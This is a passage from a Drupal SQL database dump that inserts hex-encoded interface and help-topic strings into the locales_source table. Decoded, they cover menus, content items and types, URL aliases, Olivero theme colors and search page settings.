(3696, 0x412066756c6c2065787465726e616c2055524c, '', '10.6.15'),
(3697, 0x537461727420747970696e6720746865207469746c65206f66206120636f6e74656e74206974656d20616e642073656c656374206974207768656e207468652066756c6c207469746c6520636f6d6573207570, '', '10.6.15'),
(3698, 0x3c656d3e266c743b6e6f6c696e6b2667743b3c2f656d3e20746f20646973706c617920746865203c656d3e4d656e75206c696e6b207469746c653c2f656d3e20617320706c61696e207465787420776974686f75742061206c696e6b, '', '10.6.15'),
(3699, 0x3c656d3e266c743b66726f6e742667743b3c2f656d3e20746f206c696e6b20746f207468652066726f6e742070616765206f6620796f75722073697465, '', '10.6.15'),
(3700, 0x4d616b6520737572652074686174203c656d3e456e61626c65643c2f656d3e20697320636865636b65643b206966206e6f742c20746865206d656e75206c696e6b2077696c6c206e6f7420626520646973706c617965642e, '', '10.6.15'),
(3701, 0x4f7074696f6e616c6c792c20656e7465722061203c656d3e4465736372697074696f6e3c2f656d3e2c2077686963682077696c6c20626520646973706c61796564207768656e2061207573657220686f76657273206f76657220746865206c696e6b2e, '', '10.6.15'),
(3702, 0x4f7074696f6e616c6c792c20636865636b203c656d3e53686f7720617320657870616e6465643c2f656d3e20746f206175746f6d61746963616c6c792073686f7720746865206368696c6472656e206f662074686973206c696e6b2028696620616e7929207768656e2074686973206c696e6b2069732073686f776e2e, '', '10.6.15'),
(3703, 0x4f7074696f6e616c6c792c2073656c65637420746865203c656d3e506172656e74206c696e6b3c2f656d3e2c2069662074686973206d656e75206c696e6b2073686f756c642062652061206368696c64206f6620616e6f74686572206d656e75206c696e6b2e, '', '10.6.15'),
(3704, 0x436c69636b203c656d3e536176653c2f656d3e2e20596f752077696c6c2062652072657475726e656420746f20746865203c656d3e416464206c696e6b3c2f656d3e207061676520746f2061646420616e6f74686572206c696e6b2e, '', '10.6.15'),
(3705, 0x4c6f6361746520746865206d656e7520796f75206a7573742061646465642061206c696e6b20746f20616e6420636c69636b203c656d3e456469743c2f656d3e20696e20746865203c656d3e4f7065726174696f6e733c2f656d3e206c6973742e, '', '10.6.15'),
(3706, 0x566572696679207468617420746865206f72646572206f66206c696e6b7320697320636f72726563742e204966206974206973206e6f742c2064726167206d656e75206c696e6b7320756e74696c20746865206f7264657220697320636f72726563742c20616e6420636c69636b203c656d3e536176653c2f656d3e2e, '', '10.6.15'),
(3707, 0x4372656174696e672061206d656e75, '', '10.6.15'),
(3708, 0x4372656174652061206e6577206d656e752e, '', '10.6.15'),
(3709, 0x496e20746865203c656d3e4d616e6167653c2f656d3e2061646d696e697374726174696f6e206d656e752c206e61766967617465203c656d3e5374727563747572653c2f656d3e202667743b20407374727563747572655f6d656e755f6c696e6b2e, '', '10.6.15'),
(3710, 0x436c69636b203c656d3e416464206d656e753c2f656d3e2e, '', '10.6.15'),
(3711, 0x456e74657220746865207469746c6520666f7220746865206d656e752c2077686963682069732075736564206173207468652064656661756c7420626c6f636b207469746c6520696620746865206d656e7520697320646973706c61796564206173206120626c6f636b2e20496620646573697265642c20616c736f206564697420746865206d616368696e65206e616d65206f6620746865206d656e752c2077686963682069732062792064656661756c7420646572697665642066726f6d20746865207469746c652e, '', '10.6.15'),
(3712, 0x456e74657220616e2061646d696e6973747261746976652073756d6d6172792c20776869636820697320646973706c61796564206f6e20746865203c656d3e4d656e75733c2f656d3e20706167652e, '', '10.6.15'),
(3713, 0x496620796f7572207369746520686173206d6f7265207468616e206f6e65206c616e67756167652c2063686f6f736520746865206c616e677561676520666f7220746865206d656e752e, '', '10.6.15'),
(3714, 0x436c69636b203c656d3e536176653c2f656d3e2e20596f752077696c6c206265206f6e20746865206d656e752065646974696e6720706167652c20726561647920746f20616464206c696e6b7320746f20746865206d656e752069662074686520636f726520437573746f6d204d656e75204c696e6b73206d6f64756c6520697320696e7374616c6c65643b207365652072656c6174656420746f7069637320666f722066757274686572207461736b732e, '', '10.6.15'),
(3715, 0x52656f72646572696e6720616e642064697361626c696e67206d656e75206c696e6b73, '', '10.6.15'),
(3716, 0x44697361626c65206d656e75206c696e6b73206f72206368616e676520746865206f7264657220616e6420686965726172636879206f66206d656e75206c696e6b732e, '', '10.6.15'),
(3717, 0x436c69636b203c656d3e45646974206d656e753c2f656d3e20666f7220746865206d656e75207468617420796f752077616e7420746f20656469742e, '', '10.6.15'),
(3718, 0x44726167206d656e75206c696e6b7320696e746f2061206e6577206f726465722c206f7220636865636b2f756e636865636b203c656d3e456e61626c65643c2f656d3e20746f20656e61626c65206f722064697361626c65206d656e75206c696e6b732e, '', '10.6.15'),
(3719, 0x436c69636b203c656d3e536176653c2f656d3e20746f207361766520796f7572206368616e6765732e, '', '10.6.15'),
(3720, 0x4372656174696e67206120636f6e74656e74206974656d, '', '10.6.15'),
(3721, 0x4163636573732074686520436f6e74656e74206f766572766965772070616765, '', '10.6.15'),
(3722, 0x4d616e6167696e6720636f6e74656e74, '', '10.6.15'),
(3723, 0x43726561746520616e64207075626c697368206120636f6e74656e74206974656d2e205365652040636f6e74656e745f6f766572766965775f746f70696320666f72206d6f72652061626f757420636f6e74656e7420747970657320616e6420636f6e74656e74206974656d732e, '', '10.6.15'),
(3724, 0x57686f2063616e2063726561746520636f6e74656e743f, '', '10.6.15'),
(3725, 0x5573657273207769746820746865203c656d3e40636f6e74656e745f7065726d697373696f6e735f6c696e6b3c2f656d3e207065726d697373696f6e2063616e20766973697420746865203c656d3e436f6e74656e743c2f656d3e20706167652061732064657363726962656420696e207468697320746f7069632e204561636820636f6e74656e7420747970652068617320697473206f776e20637265617465207065726d697373696f6e732e20466f72206578616d706c652c20746f2063726561746520636f6e74656e74206f6620747970652041727469636c652c2061207573657220776f756c64206e656564207468652041727469636c653a20437265617465206e657720636f6e74656e74207065726d697373696f6e2e20496e206164646974696f6e2c207573657273207769746820746865203c656d3e42797061737320636f6e74656e742061636365737320636f6e74726f6c3c2f656d3e206f72203c656d3e41646d696e697374657220636f6e74656e743c2f656d3e207065726d697373696f6e2063616e2063726561746520636f6e74656e74206974656d73206f6620616c6c2074797065732e20536f6d6520636f6e7472696275746564206d6f64756c6573206368616e676520746865207065726d697373696f6e2073747275637475726520666f72206372656174696e6720636f6e74656e742e, '', '10.6.15'),
(3726, 0x496e20746865203c656d3e4d616e6167653c2f656d3e2061646d696e697374726174697665206d656e752c206e6176696761746520746f203c656d3e40636f6e74656e745f6c696e6b3c2f656d3e2e, '', '10.6.15'),
(3727, 0x436c69636b203c656d3e41646420636f6e74656e743c2f656d3e2e, '', '10.6.15'),
(3728, 0x4966207468657265206973206d6f7265207468616e206f6e6520636f6e74656e74207479706520646566696e6564206f6e20796f75722073697465207468617420796f752068617665207065726d697373696f6e20746f206372656174652c20636c69636b20746865206e616d65206f66207468652074797065206f6620636f6e74656e7420796f752077616e7420746f206372656174652e, '', '10.6.15'),
(3729, 0x4f6e2074686520636f6e74656e74206564697420666f726d2c20656e74657220746865203c656d3e5469746c653c2f656d3e206f6620796f757220636f6e74656e742c2077686963682077696c6c2073686f77206173207468652070616765207469746c65207768656e2074686520636f6e74656e74206974656d20697320646973706c61796564206f6e206120706167652c20616e6420616c736f20617320746865206c6162656c20666f722074686520636f6e74656e74206974656d20696e2061646d696e697374726174696f6e2073637265656e732e, '', '10.6.15'),
(3730, 0x46696c6c20696e20746865206f74686572206669656c64732073686f776e206f6e20746865206564697420666f726d20666f72207468697320737065636966696320636f6e74656e7420747970652e, '', '10.6.15'),
(3731, 0x4c6561766520746865203c656d3e5075626c69736865643c2f656d3e206669656c6420636865636b656420746f207075626c6973682074686520636f6e74656e7420696d6d6564696174656c792c206f7220756e636865636b20697420746f206d616b6520697420756e7075626c69736865642e20556e7075626c697368656420636f6e74656e742069732067656e6572616c6c79206e6f742073686f776e20746f206e6f6e2d61646d696e69737472617469766520736974652075736572732e, '', '10.6.15'),
(3732, 0x4f7074696f6e616c6c792c20636c69636b203c656d3e507265766965773c2f656d3e20746f20707265766965772074686520636f6e74656e742e, '', '10.6.15'),
(3733, 0x436c69636b203c656d3e536176653c2f656d3e2e20596f752077696c6c207365652074686520636f6e74656e7420646973706c61796564206f6e206120706167652e, '', '10.6.15'),
(3734, 0x42617369632050616765204d616e6167656d656e74202844727570616c205573657220477569646529, '', '10.6.15'),
(3735, 0x4372656174696e67206120436f6e74656e74204974656d202844727570616c205573657220477569646529, '', '10.6.15'),
(3736, 0x4372656174696e67206120636f6e74656e742074797065, '', '10.6.15'),
(3737, 0x41646d696e697374657220636f6e74656e74207479706573, '', '10.6.15'),
(3738, 0x4372656174652061206e657720636f6e74656e7420747970652e205365652040636f6e74656e745f6f766572766965775f746f70696320666f72206d6f72652061626f757420636f6e74656e742074797065732e, '', '10.6.15'),
(3739, 0x57686f2063616e20637265617465206120636f6e74656e7420747970653f, '', '10.6.15'),
(3740, 0x5573657273207769746820746865203c656d3e40636f6e74656e745f7065726d697373696f6e735f6c696e6b3c2f656d3e207065726d697373696f6e20287479706963616c6c792061646d696e6973747261746f7273292063616e20637265617465206e657720636f6e74656e742074797065732e, '', '10.6.15'),
(3741, 0x496e20746865203c656d3e4d616e6167653c2f656d3e2061646d696e697374726174697665206d656e752c206e6176696761746520746f203c656d3e5374727563747572653c2f656d3e202667743b203c656d3e40636f6e74656e745f74797065735f6c696e6b3c2f656d3e2e, '', '10.6.15'),
(3742, 0x436c69636b203c656d3e41646420636f6e74656e7420747970652e3c2f656d3e, '', '10.6.15'),
(3743, 0x496e20746865203c656d3e4e616d653c2f656d3e206669656c642c20656e7465722061206e616d6520666f722074686520636f6e74656e7420747970652c20776869636820697320686f772069742077696c6c206265206c697374656420696e207468652061646d696e69737472617469766520696e746572666163652e, '', '10.6.15'),
(3744, 0x4f7074696f6e616c6c792c20656e7465722061203c656d3e4465736372697074696f6e3c2f656d3e20666f722074686520636f6e74656e7420747970652e20596f75206d617920616c736f2077616e7420746f2061646a75737420736f6d65206f66207468652073657474696e677320696e2074686520766572746963616c20746162732073656374696f6e206f6620746865206564697420706167652e, '', '10.6.15'),
(3745, 0x436c69636b203c656d3e5361766520616e64206d616e616765206669656c64733c2f656d3e2e20596f757220636f6e74656e7420747970652077696c6c20626520637265617465642c20616e6420617373756d696e6720796f7520686176652074686520636f7265204669656c64205549206d6f64756c6520696e7374616c6c65642c20796f752077696c6c2062652074616b656e20746f20746865203c656d3e4d616e616765206669656c64733c2f656d3e207061676520666f722074686520636f6e74656e7420747970652e2028496620796f7520646f206e6f7420686176652074686520636f7265204669656c64205549206d6f64756c6520696e7374616c6c65642c2074686520627574746f6e2077696c6c20736179203c656d3e536176653c2f656d3e20696e73746561642e29, '', '10.6.15'),
(3746, 0x496620796f7520686176652074686520636f7265204669656c64205549206d6f64756c6520696e7374616c6c65642c20666f6c6c6f772074686520737465707320696e207468652072656c6174656420746f7069637320746f20616464206669656c647320746f20746865206e657720636f6e74656e7420747970652c20736574207570207468652065646974696e6720666f726d2c20616e6420636f6e6669677572652074686520646973706c61792e, '', '10.6.15'),
(3747, 0x416464696e67206120436f6e74656e742054797065202844727570616c205573657220477569646529, '', '10.6.15'),
(3748, 0x53657474696e6720557020436f6e74656e7420537472756374757265202844727570616c205573657220477569646529, '', '10.6.15'),
(3749, 0x45646974696e67206120636f6e74656e74206974656d, '', '10.6.15'),
(3750, 0x46696e64206120636f6e74656e74206974656d20616e6420656469742069742c206f722075706461746520612067726f7570206f6620636f6e74656e74206974656d7320696e2062756c6b2e2053656520406e6f64655f6f766572766965775f746f70696320666f72206d6f72652061626f757420636f6e74656e7420747970657320616e6420636f6e74656e74206974656d732e, '', '10.6.15'),
(3751, 0x57686f2063616e2066696e6420616e64206564697420636f6e74656e743f, '', '10.6.15'),
(3752, 0x5573657273207769746820746865203c656d3e40636f6e74656e745f7065726d697373696f6e735f6c696e6b3c2f656d3e207065726d697373696f6e2063616e2075736520746865203c656d3e436f6e74656e743c2f656d3e207061676520746f2066696e6420636f6e74656e742e204561636820636f6e74656e7420747970652068617320697473206f776e2065646974207065726d697373696f6e732e20466f72206578616d706c652c20746f206564697420636f6e74656e74206f6620747970652041727469636c652c2061207573657220776f756c64206e65656420746865203c656d3e41727469636c653a2045646974206f776e20636f6e74656e743c2f656d3e207065726d697373696f6e20746f206564697420616e2061727469636c65207468657920637265617465642c206f7220746865203c656d3e41727469636c653a204564697420616e7920636f6e74656e743c2f656d3e207065726d697373696f6e20746f206564697420616e2061727469636c6520736f6d656f6e6520656c736520637265617465642e20496e206164646974696f6e2c207573657273207769746820746865203c656d3e42797061737320636f6e74656e742061636365737320636f6e74726f6c3c2f656d3e206f72203c656d3e41646d696e697374657220636f6e74656e743c2f656d3e207065726d697373696f6e2063616e206564697420636f6e74656e74206974656d73206f6620616c6c2074797065732e20536f6d6520636f6e7472696275746564206d6f64756c6573206368616e676520746865207065726d697373696f6e2073747275637475726520666f722065646974696e6720636f6e74656e742e, '', '10.6.15'),
(3753, 0x4f7074696f6e616c6c792c207573652066696c7465727320746f2072656475636520746865206c697374206f6620636f6e74656e74206974656d732073686f776e3a, '', '10.6.15'),
(3754, 0x3c656d3e5469746c653c2f656d3e3a206b657920776f72642873292066726f6d20746865207469746c65, '', '10.6.15'),
(3755, 0x3c656d3e436f6e74656e7420747970653c2f656d3e, '', '10.6.15'),
(3756, 0x3c656d3e5075626c6973686564207374617475733c2f656d3e, '', '10.6.15'),
(3757, 0x3c656d3e4c616e67756167653c2f656d3e, '', '10.6.15'),
(3758, 0x496620796f7520656e746572206f722073656c6563742066696c7465722076616c7565732c20636c69636b203c656d3e46696c7465723c2f656d3e20746f206170706c79207468652066696c746572732e, '', '10.6.15'),
(3759, 0x4f7074696f6e616c6c792c20736f727420746865206c69737420627920636c69636b696e67206120636f6c756d6e206865616465722e20436c69636b20616761696e20746f207265766572736520746865206f726465722e, '', '10.6.15'),
(3760, 0x546f206564697420746865207469746c65206f72206f74686572206669656c642076616c75657320666f72206f6e6520636f6e74656e74206974656d2c20636c69636b203c656d3e456469743c2f656d3e20696e2074686520726f77206f662074686520636f6e74656e74206974656d2e20557064617465207468652076616c75657320616e6420636c69636b203c656d3e536176653c2f656d3e2e, '', '10.6.15'),
(3761, 0x4120666577207479706573206f662065646974732063616e20626520646f6e6520696e2062756c6b20746f206d756c7469706c6520636f6e74656e74206974656d732e20466f72206578616d706c652c20746f207075626c697368207365766572616c20756e7075626c697368656420636f6e74656e74206974656d732c20636865636b2074686520626f78657320696e20746865206c65667420636f6c756d6e2028726967687420636f6c756d6e20696e2072696768742d746f2d6c656674206c616e6775616765732920746f2073656c65637420746865206465736972656420636f6e74656e74206974656d732e20466f72203c656d3e416374696f6e3c2f656d3e2c2073656c65637420746865203c656d3e5075626c69736820636f6e74656e743c2f656d3e20616374696f6e2e20436c69636b203c656d3e4170706c7920746f2073656c6563746564206974656d733c2f656d3e20746f206d616b6520746865206368616e67652e20546865206f7468657220616374696f6e7320756e646572203c656d3e416374696f6e3c2f656d3e20776f726b20696e20612073696d696c6172206d616e6e65722e, '', '10.6.15'),
(3762, 0x45646974696e67206120436f6e74656e74204974656d202844727570616c205573657220477569646529, '', '10.6.15'),
(3763, 0x436f6e74726f6c2064656661756c7420646973706c61792073657474696e677320666f7220796f757220736974652c206163726f737320616c6c207468656d65732e20557365207468656d652d73706563696669632073657474696e677320746f206f766572726964652074686573652064656661756c74732e, '', '10.6.15'),
(3764, 0x57686174206973206120636f6e74656e74206974656d3f, '', '10.6.15'),
(3765, 0x41203c656d3e636f6e74656e74206974656d3c2f656d3e20697320612074797065206f6620636f6e74656e7420656e7469747920666f7220706167652d6c6576656c20636f6e74656e742c2077686963682063616e2068617665206669656c647320746861742073746f726520746578742c2048544d4c206d61726b75702c20696d616765732c2061747461636865642066696c65732c20616e64206f7468657220646174612e205365652040636f6e74656e745f7374727563747572655f746f70696320666f72206d6f72652061626f757420636f6e74656e7420656e74697469657320616e64206669656c64732e, '', '10.6.15'),
(3766, 0x57686174206973206120636f6e74656e7420747970653f, '', '10.6.15'),
(3767, 0x436f6e74656e74206974656d7320617265206469766964656420696e746f203c656d3e636f6e74656e742074797065733c2f656d3e2c207768696368206172652074686520656e74697479207375622d747970657320666f722074686520636f6e74656e74206974656d20656e7469747920747970653b206561636820636f6e74656e7420747970652068617320697473206f776e206669656c647320616e6420646973706c61792073657474696e67732e20466f72206578616d706c652c20796f75206d696768742073657420757020636f6e74656e7420747970657320666f722070616765732c2061727469636c65732c20726563697065732c206576656e74732c20616e6420626c6f6720656e7472696573206f6e20796f75722077656220736974652e, '', '10.6.15'),
(3768, 0x4f76657276696577206f66206d616e6167696e6720636f6e74656e74, '', '10.6.15'),
(3769, 0x54686520636f7265204e6f6465206d6f64756c6520616c6c6f777320796f7520746f20646566696e6520636f6e74656e742074797065732c20616e642061646420616e64206564697420636f6e74656e74206974656d732e2054686520636f7265204669656c64205549206d6f64756c6520616c6c6f777320796f7520746f20617474616368206669656c647320746f206561636820636f6e74656e74207479706520616e64206d616e61676520746865206564697420666f726d20616e6420646973706c617920666f72206561636820636f6e74656e7420747970652e20536565207468652072656c6174656420746f70696373206c69737465642062656c6f7720666f72207370656369666963207461736b732e204d616e79206f7468657220636f726520616e6420636f6e7472696275746564206d6f64756c657320616e6420696e7374616c6c6174696f6e2070726f66696c65732070726f76696465207072652d646566696e656420636f6e74656e742074797065732c206d6f6469667920746865207065726d697373696f6e2073747275637475726520666f7220636f6e74656e74206974656d732c20616e642070726f76696465206f746865722066756e6374696f6e616c6974792e, '', '10.6.15'),
(3770, 0x456e74657220636f6c6f7220696e2068657861646563696d616c20666f726d6174202823616263313233292e, '', '10.6.15'),
(3771, 0x44657269766174697665732077696c6c20626520666f726d65642066726f6d207468697320636f6c6f722e, '', '10.6.15'),
(3772, 0x456e61626c65206d6f62696c65206d656e7520617420616c6c20776964746873, '', '10.6.15'),
(3773, 0x456e61626c657320746865206d6f62696c65206d656e7520746f67676c6520617420616c6c207769647468732e, '', '10.6.15'),
(3774, 0x5072696d617279204272616e64696e6720436f6c6f72, '', '10.6.15'),
(3775, 0x47726179, '', '10.6.15'),
(3776, 0x5768697465, '', '10.6.15'),
(3777, 0x4865616465722073697465206272616e64696e67206261636b67726f756e6420636f6c6f72, '', '10.6.15'),
(3778, 0x54686573652073657474696e67732061646a75737420746865206c6f6f6b20616e64206665656c206f6620746865204f6c697665726f207468656d652e204368616e67696e672074686520636f6c6f722062656c6f772077696c6c206368616e6765207468652062617365206875652c2073617475726174696f6e2c20616e64206c696768746e6573732076616c75657320746865204f6c697665726f207468656d65207573657320746f2064657465726d696e652069747320696e7465726e616c20636f6c6f72732e, '', '10.6.15'),
(3779, 0x426c7565204c61676f6f6e202844656661756c7429, '', '10.6.15'),
(3780, 0x46697265686f757365, '', '10.6.15'),
(3781, 0x496365, '', '10.6.15'),
(3782, 0x506c756d, '', '10.6.15'),
(3783, 0x536c617465, '', '10.6.15'),
(3784, 0x4f6c697665726f20436f6c6f7220536368656d65, '', '10.6.15'),
(3785, 0x5072696d617279206261736520636f6c6f72, '', '10.6.15'),
(3786, 0x4f6c697665726f20436f6c6f7220536368656d652053657474696e6773, '', '10.6.15'),
(3787, 0x4f6c697665726f205574696c6974696573, '', '10.6.15'),
(3788, 0x4372656174696e6720612055524c20616c69617320666f72206120636f6e74656e74206974656d, '', '10.6.15'),
(3789, 0x43726561746520616e6420656469742055524c20616c6961736573, '', '10.6.15'),
(3790, 0x436f6e6669677572696e6720616c696173657320666f722055524c73, '', '10.6.15'),
(3791, 0x47697665206120636f6e74656e74206974656d207061676520612068756d616e2d206f722053454f2d667269656e646c792055524c20616c6961733b20796f752063616e20666f6c6c6f772073696d696c617220737465707320746f2063726561746520616e20616c69617320666f722061207461786f6e6f6d79207465726d20706167652e2053656520406f766572766965775f746f70696320666f72206d6f72652061626f757420616c69617365732e, '', '10.6.15'),
(3792, 0x57686f2063616e206372656174652055524c20616c69617365733f, '', '10.6.15'),
(3793, 0x5573657273207769746820746865203c656d3e40706174685f7065726d697373696f6e735f6c696e6b3c2f656d3e207065726d697373696f6e2063616e2063726561746520616c69617365732e20546f20666f6c6c6f772074686520737465707320696e207468697320746f7069632c20796f752077696c6c20616c736f206e656564207065726d697373696f6e20746f20656469742074686520636f6e74656e74206974656d2e, '', '10.6.15'),
(3794, 0x4c6f6361746520616e64206f70656e2074686520636f6e74656e74206564697420666f726d20666f722074686520636f6e74656e74206974656d2c206f72206372656174652061206e657720636f6e74656e74206974656d20287365652072656c6174656420746f70696373206f6e206372656174696e6720616e642065646974696e6720636f6e74656e74292e, '', '10.6.15'),
(3795, 0x556e646572203c656d3e55524c20616c6961733c2f656d3e206f6e20746865206564697420666f726d2c20656e74657220746865206465736972656420616c6961732028666f72206578616d706c652c20222f61626f75742d757322292e204d616b6520737572652074686520616c696173207374617274732077697468206120222f22206368617261637465722e, '', '10.6.15'),
(3796, 0x56657269667920746861742074686520706167652063616e2062652076697369746564207769746820746865206e657720616c6961732c20666f72206578616d706c65203c656d3e68747470733a2f2f6578616d706c652e636f6d2f61626f75742d75733c2f656d3e2e, '', '10.6.15'),
(3797, 0x406669656c644e616d6520686173206368616e67656420746f20406669656c6456616c7565, '', '10.6.15'),
(3798, 0x45646974696e6720612055524c20616c696173, '', '10.6.15'),
(3799, 0x41646d696e69737465722055524c20616c6961736573, '', '10.6.15'),
(3800, 0x4368616e676520616e206578697374696e672055524c20616c6961732c20746f20636f7272656374207468652070617468206f722074686520616c6961732076616c75652e205365652040706174685f6f766572766965775f746f70696320666f72206d6f72652061626f757420616c69617365732e, '', '10.6.15'),
(3801, 0x57686f2063616e206d616e6167652055524c20616c69617365733f, '', '10.6.15'),
(3802, 0x5573657273207769746820746865203c656d3e40706174685f7065726d697373696f6e735f6c696e6b3c2f656d3e207065726d697373696f6e2063616e206564697420616c69617365732e, '', '10.6.15'),
(3803, 0x496e20746865203c656d3e4d616e6167653c2f656d3e2061646d696e697374726174696f6e206d656e752c206e6176696761746520746f203c656d3e436f6e66696775726174696f6e3c2f656d3e202667743b203c656d3e53656172636820616e64206d657461646174613c2f656d3e202667743b203c656d3e40706174685f616c69617365735f6c696e6b3c2f656d3e2e2041206c697374206f6620616c6c207468652073697465277320616c69617365732077696c6c206170706561722e, '', '10.6.15'),
(3804, 0x436c69636b203c656d3e456469743c2f656d3e20696e207468652064726f70646f776e20627574746f6e20666f722074686520616c696173207468617420796f7520776f756c64206c696b6520746f206368616e67652e, '', '10.6.15'),
(3805, 0x4d616b6520746865207265717569726564206368616e67657320616e6420636c69636b203c656d3e536176653c2f656d3e2e20596f752077696c6c2062652072657475726e656420746f207468652055524c20616c696173206c69737420706167652e, '', '10.6.15'),
(3806, 0x4e6f7465207468617420796f752063616e20616c736f20616464206e657720616c69617365732066726f6d207468697320706167652c20666f7220616e792070617468206f6e20796f757220736974652e, '', '10.6.15'),
(3807, 0x5768617420697320612055524c3f, '', '10.6.15'),
(3808, 0x55524c2069732074686520616262726576696174696f6e20666f722022556e69666f726d205265736f75726365204c6f6361746f72222c20776869636820697320746865207061676527732061646472657373206f6e20746865207765622e2049742069732074686520226e616d652220627920776869636820612062726f77736572206964656e7469666965732061207061676520746f20646973706c61792e20496e20746865206578616d706c6520225669736974207573206174203c656d3e6578616d706c652e636f6d3c2f656d3e2e222c203c656d3e68747470733a2f2f6578616d706c652e636f6d3c2f656d3e20776f756c64206265207468652055524c20666f722074686520686f6d652070616765206f6620796f757220776562736974652e205573657273207573652055524c7320746f206c6f6361746520636f6e74656e74206f6e20746865207765622e, '', '10.6.15'),
(3809, 0x57686174206973206120706174683f, '', '10.6.15'),
(3810, 0x4120706174682069732074686520756e697175652c206c6173742070617274206f66207468652055524c20666f7220612073706563696669632066756e6374696f6e206f72207069656365206f6620636f6e74656e742e20466f72206578616d706c652c20666f72206120706167652077686f73652066756c6c2055524c206973203c656d3e68747470733a2f2f6578616d706c652e636f6d2f6e6f64652f373c2f656d3e2c207468652070617468206973203c656d3e6e6f64652f373c2f656d3e2e20486572652061726520736f6d65206578616d706c6573206f6620706174687320796f75206d696768742066696e6420696e20796f757220736974653a, '', '10.6.15'),
(3811, 0x6e6f64652f373a205061746820746f206120706172746963756c617220636f6e74656e74206974656d2e, '', '10.6.15'),
(3812, 0x7461786f6e6f6d792f7465726d2f363a205061746820746f2061207461786f6e6f6d79207465726d20706167652e, '', '10.6.15'),
(3813, 0x757365722f333a205061746820746f206120757365722070726f66696c6520706167652e, '', '10.6.15'),
(3814, 0x5768617420697320616e20616c6961733f, '', '10.6.15'),
(3815, 0x54686520636f726520736f66747761726520616c6c6f777320796f7520746f2070726f76696465206d6f726520756e6465727374616e6461626c652055524c7320666f72207061676573206f6e20796f757220736974652c207768696368206172652063616c6c6564203c656d3e616c69617365733c2f656d3e2e20466f72206578616d706c652c20696620796f75206861766520616e202241626f75742055732220706167652077697468207468652070617468203c656d3e6e6f64652f373c2f656d3e2c20796f752063616e2073657420757020616e20616c696173206f66203c656d3e61626f75743c2f656d3e20736f207468617420796f75722076697369746f72732077696c6c20736565206974206173203c656d3e68747470733a2f2f7777772e6578616d706c652e636f6d2f61626f75743c2f656d3e2e, '', '10.6.15'),
(3816, 0x4f76657276696577206f6620636f6e6669677572696e672070617468732c20616c69617365732c20616e642055524c73, '', '10.6.15'),
(3817, 0x54686520636f72652050617468206d6f64756c652070726f7669646573207468652055524c20616c696173696e672066756e6374696f6e616c6974792e2054686520636f6e7472696275746564203c6120687265663d2268747470733a2f2f7777772e64727570616c2e6f72672f70726f6a6563742f706174686175746f223e506174686175746f3c2f613e206d6f64756c6520616c6c6f777320796f7520746f20636f6e666967757265206175746f6d61746963616c6c792d67656e6572617465642055524c20616c696173657320666f7220636f6e74656e74206974656d7320616e64206f746865722070616765732e20536565207468652072656c6174656420746f70696373206c69737465642062656c6f7720666f72207370656369666963207461736b732e, '', '10.6.15'),
(3818, 0x436f6e636570743a2050617468732c20416c69617365732c20616e642055524c73202844727570616c205573657220477569646529, '', '10.6.15'),
(3819, 0x436f6e6669677572696e6720736561726368207061676573, '', '10.6.15'),
(3820, 0x4d616e6167696e67207468652073656172636820696e646578, '', '10.6.15'),
(3821, 0x436f6e666967757265206f6e65206f72206d6f7265207365617263682070616765732e, '', '10.6.15'),
(3822, 0x496e20746865203c656d3e4d616e6167653c2f656d3e2061646d696e697374726174697665206d656e752c206e6176696761746520746f203c656d3e436f6e66696775726174696f6e3c2f656d3e202667743b203c656d3e53656172636820616e64204d657461646174613c2f656d3e202667743b203c656d3e407365617263685f73657474696e67735f6c696e6b3c2f656d3e2e, '', '10.6.15'),
(3823, 0x5363726f6c6c20646f776e20746f20746865203c656d3e5365617263682070616765733c2f656d3e2073656374696f6e2e20596f752077696c6c207365652061206c697374206f662074686520616c72656164792d636f6e6669677572656420736561726368207061676573206f6e20796f757220736974652e, '', '10.6.15'),
(3824, 0x546f20636f6e66696775726520616e206578697374696e672073656172636820706167652c20636c69636b203c656d3e456469743c2f656d3e2e204f722c20746f206164642061206e65772073656172636820706167652c2073656c65637420746865203c656d3e536561726368207061676520747970653c2f656d3e20616e6420636c69636b203c656d3e4164642073656172636820706167653c2f656d3e2e, '', '10.6.15'),
(3825, 0x456e746572207468652064657369726564203c656d3e4c6162656c3c2f656d3e206e616d6520616e642055524c203c656d3e506174683c2f656d3e20666f72207468652073656172636820706167652e, '', '10.6.15'),
(3826, 0x466f72203c656d3e436f6e74656e743c2f656d3e207365617263682070616765732c2073656c656374207468652064657369726564206c6576656c206f6620696e666c75656e636520696e2072616e6b696e672073656172636820726573756c7473206f662074686520617661696c61626c65203c656d3e436f6e74656e742072616e6b696e673c2f656d3e20666163746f72732e, '', '10.6.15'),
(3827, 0x436c69636b203c656d3e536176653c2f656d3e2e20596f752077696c6c2062652072657475726e656420746f20746865203c656d3e5365617263682070616765733c2f656d3e20706167652e, '', '10.6.15'),
(3828, 0x56657269667920746861742074686520636f7272656374207365617263682070616765206973206c6973746564206173203c656d3e44656661756c743c2f656d3e20696e20746865203c656d3e5374617475733c2f656d3e20636f6c756d6e2e204966206e6f742c20636c69636b203c656d3e5365742061732064656661756c743c2f656d3e20696e20746865203c656d3e4f7065726174696f6e733c2f656d3e206c69737420666f722074686520636f72726563742073656172636820706167652e, '', '10.6.15'),
(3829, 0x4f7074696f6e616c6c792c2064697361626c65206f722064656c65746520616e7920736561726368207061676573207468617420796f7520646f206e6f742077616e7420746f206861766520617661696c61626c65206f6e207468652073697465202864697361626c696e672069732074656d706f726172792c207768696c652064656c6574696e67206973207065726d616e656e74292e, '', '10.6.15'),
(3830, 0x466f6c6c6f772074686520737465707320696e20407365617263685f696e6465785f746f70696320746f206d616b6520737572652074686174207468652073656172636820696e64657820697320757064617465642e, '', '10.6.15'),
(3831, 0x4d616e616765207468652073656172636820696e6465782c20616e64206d616b65207375726520746861742074686520736974652069732066756c6c7920696e646578656420666f7220736561726368696e672e, '', '10.6.15'),
(3832, 0x57686174206973207468652073656172636820696e6465783f, '', '10.6.15');
INSERT INTO `locales_source` (`lid`, `source`, `context`, `version`) VALUES
